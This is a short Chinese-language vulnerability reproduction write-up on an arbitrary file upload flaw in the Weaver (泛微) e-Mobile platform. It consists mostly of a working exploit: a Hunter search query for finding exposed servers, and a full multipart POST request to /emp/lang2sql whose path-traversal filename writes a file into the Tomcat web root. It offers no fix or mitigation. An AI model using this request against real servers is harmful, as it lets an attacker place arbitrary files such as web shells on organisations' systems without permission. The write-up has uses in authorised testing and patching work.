泛微e-Mobile 移动管理平台文件上传漏洞
一、漏洞简介
泛微e-Mobile移动管理平台是一款由泛微软件开发的企业移动办公解决方案。它提供了一系列的功能和工具,使企业员工能够通过移动设备随时随地地进行办公和协作。泛微e-Mobile 移动管理平台存在任意文件上传漏洞。
二、影响版本
- 泛微e-Mobile 移动管理平台
三、资产测绘
- hunter
app.name="泛微 e-Mobile 移动管理平台" - 特征
四、漏洞复现
当访问/emp/lang2sql出现如下页面表示可能存在漏洞
上传文件
POST /emp/lang2sql?client_type=1&lang_tag=1 HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Upgrade-Insecure-Requests: 1
SL-CE-SUID: 15
Content-Type: multipart/form-data; boundary=00content0boundary00
Content-Length: 235
--00content0boundary00
Content-Disposition: form-data; name="source"
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="../../../../appsvr/tomcat/webapps/ROOT/x.txt"
test
--00content0boundary00--
上传文件位置,根目录
/x.txt